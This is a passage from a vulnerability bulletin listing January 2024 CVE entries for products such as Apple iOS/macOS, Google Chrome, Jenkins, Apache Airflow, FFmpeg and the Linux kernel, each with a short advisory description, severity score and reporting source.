cna@vuldb.com
cna@vuldb.com
smp7,wp.insider — simple_membership
 
URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in smp7, wp.Insider Simple Membership. This issue affects Simple Membership: from n/a through 4.4.1. 2024-01-24 3.4 CVE-2024-22308
audit@patchstack.com
totolink — n200re_v5
 
A vulnerability was found in Totolink N200RE V5 9.3.5u.6255_B20211224. It has been classified as problematic. Affected is an unknown function of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-252186 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 3.7 CVE-2024-0942
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink — n350rt
 
A vulnerability was found in Totolink N350RT 9.3.5u.6255. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252187. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 3.7 CVE-2024-0943
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink — t8
 
A vulnerability was found in Totolink T8 4.1.5cu.833_20220905. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252188. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 3.7 CVE-2024-0944
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
angel_coffee — mini-app_line
 
An issue in angel coffee mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-26 not yet calculated CVE-2023-48133
cve@mitre.org
anglersnet_co._ltd. — access_analysis_cgi_an-analyzer
 
Open redirect vulnerability in Access analysis CGI An-Analyzer released in 2023 December 31 and earlier allows a remote unauthenticated attacker to redirect users to arbitrary websites and conduct phishing attacks via a specially crafted URL. 2024-01-22 not yet calculated CVE-2024-22113
vultures@jpcert.or.jp
vultures@jpcert.or.jp
apache_software_foundation — apache_airflow
 
Apache Airflow, versions before 2.8.1, have a vulnerability that allows a potential attacker to poison the XCom data by bypassing the protection of “enable_xcom_pickling=False” configuration setting resulting in poisoned data after XCom deserialization. This vulnerability is considered low since it requires a DAG author to exploit it. Users are recommended to upgrade to version 2.8.1 or later, which fixes this issue. 2024-01-24 not yet calculated CVE-2023-50943
security@apache.org
security@apache.org
security@apache.org
apache_software_foundation — apache_airflow
 
Apache Airflow, versions before 2.8.1, have a vulnerability that allows an authenticated user to access the source code of a DAG to which they don’t have access. This vulnerability is considered low since it requires an authenticated user to exploit it. Users are recommended to upgrade to version 2.8.1, which fixes this issue. 2024-01-24 not yet calculated CVE-2023-50944
security@apache.org
security@apache.org
security@apache.org
apache_software_foundation — apache_airflow_cncf_kubernetes_provider
 
Since version 5.2.0, when using deferrable mode with the path of a Kubernetes configuration file for authentication, the Airflow worker serializes this configuration file as a dictionary and sends it to the triggerer by storing it in metadata without any encryption. Additionally, if used with an Airflow version between 2.3.0 and 2.6.0, the configuration dictionary will be logged as plain text in the triggerer service without masking. This allows anyone with access to the metadata or triggerer log to obtain the configuration file and use it to access the Kubernetes cluster. This behavior was changed in version 7.0.0, which stopped serializing the file contents and started providing the file path instead to read the contents into the trigger. Users are recommended to upgrade to version 7.0.0, which fixes this issue. 2024-01-24 not yet calculated CVE-2023-51702
security@apache.org
security@apache.org
security@apache.org
security@apache.org
security@apache.org
apple — ios_and_ipados
 
A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 16.7.5 and iPadOS 16.7.5, watchOS 10.2, macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 17.2 and iPadOS 17.2. An app may be able to access sensitive user data. 2024-01-23 not yet calculated CVE-2023-42937
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ios_and_ipados
 
The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges. 2024-01-23 not yet calculated CVE-2024-23208
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ios_and_ipados
 
This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to view a user’s phone number in system logs. 2024-01-23 not yet calculated CVE-2024-23210
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ios_and_ipados
 
A privacy issue was addressed with improved handling of user preferences. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A user’s private browsing activity may be visible in Settings. 2024-01-23 not yet calculated CVE-2024-23211
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ios_and_ipados
 
The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. Processing web content may lead to arbitrary code execution. 2024-01-23 not yet calculated CVE-2024-23213
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ios_and_ipados
 
Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, iOS 17.3 and iPadOS 17.3. Processing maliciously crafted web content may lead to arbitrary code execution. 2024-01-23 not yet calculated CVE-2024-23214
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ios_and_ipados
 
An issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access user-sensitive data. 2024-01-23 not yet calculated CVE-2024-23215
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ios_and_ipados
 
A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. An app may be able to bypass certain Privacy preferences. 2024-01-23 not yet calculated CVE-2024-23217
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ios_and_ipados
 
A timing side-channel issue was addressed with improvements to constant-time computation in cryptographic functions. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An attacker may be able to decrypt legacy RSA PKCS#1 v1.5 ciphertexts without having the private key. 2024-01-23 not yet calculated CVE-2024-23218
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ios_and_ipados
 
The issue was addressed with improved authentication. This issue is fixed in iOS 17.3 and iPadOS 17.3. Stolen Device Protection may be unexpectedly disabled. 2024-01-23 not yet calculated CVE-2024-23219
product-security@apple.com
product-security@apple.com
apple — macos
 
Multiple issues were addressed by updating to curl version 8.4.0. This issue is fixed in macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 16.7.5 and iPadOS 16.7.5. Multiple issues in curl. 2024-01-23 not yet calculated CVE-2023-42915
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — macos
 
An authentication issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.6.4. A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen. 2024-01-23 not yet calculated CVE-2023-42935
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — macos
 
The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, macOS Ventura 13.6.4, macOS Monterey 12.7.3. An app may be able to execute arbitrary code with kernel privileges. 2024-01-23 not yet calculated CVE-2024-23212
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — macos
 
A type confusion issue was addressed with improved checks. This issue is fixed in tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited. 2024-01-23 not yet calculated CVE-2024-23222
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
appleple_inc. — a-blog_cms_ver.3.1.x_series
 
Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary code by uploading a specially crafted SVG file. 2024-01-23 not yet calculated CVE-2024-23180
vultures@jpcert.or.jp
vultures@jpcert.or.jp
appleple_inc. — a-blog_cms_ver.3.1.x_series
 
Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote unauthenticated attacker to execute an arbitrary script on the logged-in user’s web browser. 2024-01-23 not yet calculated CVE-2024-23181
vultures@jpcert.or.jp
vultures@jpcert.or.jp
appleple_inc. — a-blog_cms_ver.3.1.x_series
 
Relative path traversal vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to delete arbitrary files on the server. 2024-01-23 not yet calculated CVE-2024-23182
vultures@jpcert.or.jp
vultures@jpcert.or.jp
appleple_inc. — a-blog_cms_ver.3.1.x_series
 
Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute an arbitrary script on the logged-in user’s web browser. 2024-01-23 not yet calculated CVE-2024-23183
vultures@jpcert.or.jp
vultures@jpcert.or.jp
appleple_inc. — a-blog_cms_ver.3.1.x_series
 
Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary JavaScript code by uploading a specially crafted SVG file. 2024-01-23 not yet calculated CVE-2024-23348
vultures@jpcert.or.jp
vultures@jpcert.or.jp
badaix — snapcast
 
An issue was discovered in badaix Snapcast version 0.27.0, allows remote attackers to execute arbitrary code and gain sensitive information via crafted request in JSON-RPC-API. 2024-01-23 not yet calculated CVE-2023-36177
cve@mitre.org
cve@mitre.org
beetl-bbs — beetl-bbs
 
Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the /index keyword parameter. 2024-01-23 not yet calculated CVE-2024-22490
cve@mitre.org
chasquid — chasquid
 
chasquid before 1.13 allows SMTP smuggling because LF-terminated lines are accepted. 2024-01-22 not yet calculated CVE-2023-52354
cve@mitre.org
chigasaki_bakery — mini-app_line
 
An issue in CHIGASAKI BAKERY mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-26 not yet calculated CVE-2023-48131
cve@mitre.org
classLink — oneclick_extension
 
A Universal Cross Site Scripting (UXSS) vulnerability in ClassLink OneClick Extension through 10.8 allows remote attackers to inject JavaScript into any webpage. NOTE: this issue exists because of an incomplete fix for CVE-2022-48612. 2024-01-23 not yet calculated CVE-2023-45889
cve@mitre.org
cve@mitre.org
clojure — clojure
 
In Clojure before 1.9.0, classes can be used to construct a serialized object that executes arbitrary code upon deserialization. This is relevant if a server deserializes untrusted objects. 2024-01-22 not yet calculated CVE-2017-20189
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cloudlinux_os — cagefs
 
CloudLinux CageFS 7.1.1-1 or below passes the authentication token as command line argument. In some configurations this allows local users to view it via the process list and gain code execution as another user. 2024-01-22 not yet calculated CVE-2020-36771
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
cloudlinux_os — cagefs
 
CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths supplied to the sendmail proxy command. This allows local users to read and write arbitrary files outside the CageFS environment in a limited way. 2024-01-22 not yet calculated CVE-2020-36772
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
cohesity — dataprotect
 
Cohesity DataProtect prior to 6.8.1_u5 or 7.1 was discovered to have an incorrect access control vulnerability due to a lack of TLS Certificate Validation. 2024-01-19 not yet calculated CVE-2023-33295
cve@mitre.org
cve@mitre.org
coign — crm_portal
 
An issue in Coign CRM Portal v.06.06 allows a remote attacker to escalate privileges via the userPermissionsList parameter in Session Storage component. 2024-01-24 not yet calculated CVE-2023-43317
cve@mitre.org
contiki-ng — tinydtls An issue was discovered in Contiki-NG tinyDTLS through 2018-08-30. One incorrect handshake could complete with different epoch numbers in the packets Client_Hello, Client_key_exchange, and Change_cipher_spec, which may cause denial of service. 2024-01-22 not yet calculated CVE-2021-42141
cve@mitre.org
cve@mitre.org
cve@mitre.org
contiki-ng — tinydtls
 
An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. DTLS servers mishandle the early use of a large epoch number. This vulnerability allows remote attackers to cause a denial of service and false-positive packet drops. 2024-01-23 not yet calculated CVE-2021-42142
cve@mitre.org
cve@mitre.org
contiki-ng — tinydtls
 
An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. An infinite loop bug exists during the handling of a ClientHello handshake message. This bug allows remote attackers to cause a denial of service by sending a malformed ClientHello handshake message with an odd length of cipher suites, which triggers an infinite loop (consuming all resources) and a buffer over-read that can disclose sensitive information. 2024-01-24 not yet calculated CVE-2021-42143
cve@mitre.org
contiki-ng — tinydtls
 
Buffer over-read vulnerability in Contiki-NG tinyDTLS through master branch 53a0d97 allows attackers obtain sensitive information via crafted input to dtls_ccm_decrypt_message(). 2024-01-24 not yet calculated CVE-2021-42144
cve@mitre.org
contiki-ng — tinydtls
 
An assertion failure discovered in in check_certificate_request() in Contiki-NG tinyDTLS through master branch 53a0d97 allows attackers to cause a denial of service. 2024-01-24 not yet calculated CVE-2021-42145
cve@mitre.org
contiki-ng — tinydtls
 
An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. DTLS servers allow remote attackers to reuse the same epoch number within two times the TCP maximum segment lifetime, which is prohibited in RFC6347. This vulnerability allows remote attackers to obtain sensitive application (data of connected clients). 2024-01-24 not yet calculated CVE-2021-42146
cve@mitre.org
contiki-ng — tinydtls
 
Buffer over-read vulnerability in the dtls_sha256_update function in Contiki-NG tinyDTLS through master branch 53a0d97 allows remote attackers to cause a denial of service via crafted data packet. 2024-01-24 not yet calculated CVE-2021-42147
cve@mitre.org
d-link — dir-815
 
There is a command injection vulnerability in the ssdpcgi_main function of cgibin binary in D-Link DIR-815 router firmware v1.04. 2024-01-24 not yet calculated CVE-2024-22651
cve@mitre.org
d-link — dir-882
 
D-Link DIR-882 DIR882A1_FW130B06 was discovered to contain a stack overflow via the sub_477AA0 function. 2024-01-24 not yet calculated CVE-2024-22751
cve@mitre.org
cve@mitre.org
elecom_co._ltd. — wrc-x1800gs-b
 
OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product. Affected products and versions are as follows: WRC-X1800GS-B v1.17 and earlier, WRC-X1800GSA-B v1.17 and earlier, WRC-X1800GSH-B v1.17 and earlier, WRC-X6000XS-G v1.09, and WRC-X6000XST-G v1.12 and earlier. 2024-01-24 not yet calculated CVE-2024-22372
vultures@jpcert.or.jp
vultures@jpcert.or.jp
ezserver — ezserver
 
EzServer 6.4.017 allows a denial of service (daemon crash) via a long string, such as one for the RNTO command. 2024-01-25 not yet calculated CVE-2024-23985
cve@mitre.org
ffmpeg — ffmpeg
 
Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the jpegxl_anim_read_packet component in the JPEG XL Animation decoder. 2024-01-27 not yet calculated CVE-2024-22860
cve@mitre.org
cve@mitre.org
ffmpeg — ffmpeg
 
Integer overflow vulnerability in FFmpeg before n6.1, allows attackers to cause a denial of service (DoS) via the avcodec/osq module. 2024-01-27 not yet calculated CVE-2024-22861
cve@mitre.org
ffmpeg — ffmpeg
 
Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the JJPEG XL Parser. 2024-01-27 not yet calculated CVE-2024-22862
cve@mitre.org
cve@mitre.org
form_tools — form_tools
 
Form Tools v3.1.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /form_builder/preview.php?form_id=2. 2024-01-25 not yet calculated CVE-2024-22637
cve@mitre.org
ghost — ghost
 
Ghost before 5.76.0 allows XSS via a post excerpt in excerpt.js. An XSS payload can be rendered in post summaries. 2024-01-21 not yet calculated CVE-2024-23725
cve@mitre.org
cve@mitre.org
ginza_cafe — mini-app _line
 
An issue in GINZA CAFE mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-26 not yet calculated CVE-2023-48130
cve@mitre.org
gnome — gdxpixbuf
 
In GNOME GdkPixbuf (aka gdk-pixbuf) through 2.42.10, the ANI (Windows animated cursor) decoder encounters heap memory corruption (in ani_load_chunk in io-ani.c) when parsing chunks in a crafted .ani file. A crafted file could allow an attacker to overwrite heap metadata, leading to a denial of service or code execution attack. This occurs in gdk_pixbuf_set_option() in gdk-pixbuf.c. 2024-01-26 not yet calculated CVE-2022-48622
cve@mitre.org
google — chrome
 
Insufficient policy enforcement in iOS Security UI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) 2024-01-24 not yet calculated CVE-2024-0804
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome
 
Inappropriate implementation in Downloads in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Medium) 2024-01-24 not yet calculated CVE-2024-0805
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome
 
Use after free in Passwords in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium) 2024-01-24 not yet calculated CVE-2024-0806
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome
 
Use after free in Web Audio in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2024-01-24 not yet calculated CVE-2024-0807
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome
 
Integer underflow in WebUI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High) 2024-01-24 not yet calculated CVE-2024-0808
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome
 
Inappropriate implementation in Autofill in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low) 2024-01-24 not yet calculated CVE-2024-0809
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome
 
Insufficient policy enforcement in DevTools in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium) 2024-01-24 not yet calculated CVE-2024-0810
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome
 
Inappropriate implementation in Extensions API in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Low) 2024-01-24 not yet calculated CVE-2024-0811
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome
 
Inappropriate implementation in Accessibility in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High) 2024-01-24 not yet calculated CVE-2024-0812
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome
 
Use after free in Reading Mode in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium) 2024-01-24 not yet calculated CVE-2024-0813
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome
 
Incorrect security UI in Payments in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially spoof security UI via a crafted HTML page. (Chromium security severity: Medium) 2024-01-24 not yet calculated CVE-2024-0814
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
gpac — gpac
 
GPAC v2.3 was detected to contain a buffer overflow via the function gf_isom_new_generic_sample_description function in the isomedia/isom_write.c:4577 2024-01-25 not yet calculated CVE-2024-22749
cve@mitre.org
cve@mitre.org
igalerie — igalerie
 
iGalerie v3.0.22 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Titre (Title) field in the editing interface. 2024-01-25 not yet calculated CVE-2024-22639
cve@mitre.org
ivanti — avalanche
 
Directory Traversal vulnerability in Ivanti Avalanche 6.3.4.153 allows a remote authenticated attacker to obtain sensitive information via the javax.faces.resource component. 2024-01-25 not yet calculated CVE-2023-41474
cve@mitre.org
jenkins — jenkins
 
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an ‘@’ character followed by a file path in an argument with the file’s contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system. 2024-01-24 not yet calculated CVE-2024-23897
jenkinsci-cert@googlegroups.com
jenkins — jenkins
 
Jenkins 2.217 through 2.441 (both inclusive), LTS 2.222.1 through 2.426.2 (both inclusive) does not perform origin validation of requests made through the CLI WebSocket endpoint, resulting in a cross-site WebSocket hijacking (CSWSH) vulnerability, allowing attackers to execute CLI commands on the Jenkins controller. 2024-01-24 not yet calculated CVE-2024-23898
jenkinsci-cert@googlegroups.com
jenkins — jenkins
 
Jenkins Git server Plugin 99.va_0826a_b_cdfa_d and earlier does not disable a feature of its command parser that replaces an ‘@’ character followed by a file path in an argument with the file’s contents, allowing attackers with Overall/Read permission to read content from arbitrary files on the Jenkins controller file system. 2024-01-24 not yet calculated CVE-2024-23899
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins
 
Jenkins Matrix Project Plugin 822.v01b_8c85d16d2 and earlier does not sanitize user-defined axis names of multi-configuration projects, allowing attackers with Item/Configure permission to create or replace any config.xml files on the Jenkins controller file system with content not controllable by the attackers. 2024-01-24 not yet calculated CVE-2024-23900
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins
 
Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier unconditionally discovers projects that are shared with the configured owner group, allowing attackers to configure and share a project, resulting in a crafted Pipeline being built by Jenkins during the next scan of the group. 2024-01-24 not yet calculated CVE-2024-23901
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins
 
A cross-site request forgery (CSRF) vulnerability in Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier allows attackers to connect to an attacker-specified URL. 2024-01-24 not yet calculated CVE-2024-23902
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins
 
Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token. 2024-01-24 not yet calculated CVE-2024-23903
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins
 
Jenkins Log Command Plugin 1.0.2 and earlier does not disable a feature of its command parser that replaces an ‘@’ character followed by a file path in an argument with the file’s contents, allowing unauthenticated attackers to read content from arbitrary files on the Jenkins controller file system. 2024-01-24 not yet calculated CVE-2024-23904
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jenkins — jenkins
 
Jenkins Red Hat Dependency Analytics Plugin 0.7.1 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download. 2024-01-24 not yet calculated CVE-2024-23905
jenkinsci-cert@googlegroups.com
jenkinsci-cert@googlegroups.com
jensen_of_scandinavia — eagle_1200
 
Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a command injection vulnerability in the function formWriteFacMac. This vulnerability allows attackers to execute arbitrary commands via manipulation of the mac parameter. 2024-01-22 not yet calculated CVE-2023-24135
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
jfinalcms — jfinalcms
 
Cross Site Scripting (XSS) vulnerability in JFinalcms 5.0.0 allows attackers to run arbitrary code via the /admin/login username parameter. 2024-01-23 not yet calculated CVE-2024-22496
cve@mitre.org
jfinalcms — jfinalcms
 
Cross Site Scripting (XSS) vulnerability in /admin/login password parameter in JFinalcms 5.0.0 allows attackers to run arbitrary code via crafted URL. 2024-01-23 not yet calculated CVE-2024-22497
cve@mitre.org
kanboard — kanboard
 
Kanboard 1.2.34 is vulnerable to Html Injection in the group management feature. 2024-01-24 not yet calculated CVE-2024-22720
cve@mitre.org
kimono-oldnew — mini-app_line
 
An issue in kimono-oldnew mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-26 not yet calculated CVE-2023-48129
cve@mitre.org
kosei entertainment — esportsstudiolegends_mini-app_line
 
An issue in kosei entertainment esportsstudioLegends mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-26 not yet calculated CVE-2023-48132
cve@mitre.org
leptoncms — leptoncms
 
An arbitrary file upload vulnerability in LeptonCMS v7.0.0 allows authenticated attackers to execute arbitrary code via uploading a crafted PHP file. 2024-01-25 not yet calculated CVE-2024-24399
cve@mitre.org
linux — kernel
 
In the Linux kernel before 6.5.9, there is a NULL pointer dereference in send_acknowledge in net/nfc/nci/spi.c. 2024-01-23 not yet calculated CVE-2023-46343
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
linux — kernel
 
In the Linux kernel before 6.4.12, amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c has a fence use-after-free. 2024-01-23 not yet calculated CVE-2023-51042
cve@mitre.org
cve@mitre.org
linux — kernel
 
In the Linux kernel before 6.4.5, drivers/gpu/drm/drm_atomic.c has a use-after-free during a race condition between a nonblocking atomic commit and a driver unload. 2024-01-23 not yet calculated CVE-2023-51043
cve@mitre.org
cve@mitre.org
linux — kernel
 
An issue was discovered in ksmbd in the Linux kernel before 6.6.10. smb2_get_data_area_len in fs/smb/server/smb2misc.c can cause an smb_strndup_from_utf16 out-of-bounds access because the relationship between Name data and CreateContexts data is mishandled. 2024-01-23 not yet calculated CVE-2024-22705
cve@mitre.org
cve@mitre.org
linux — kernel
 
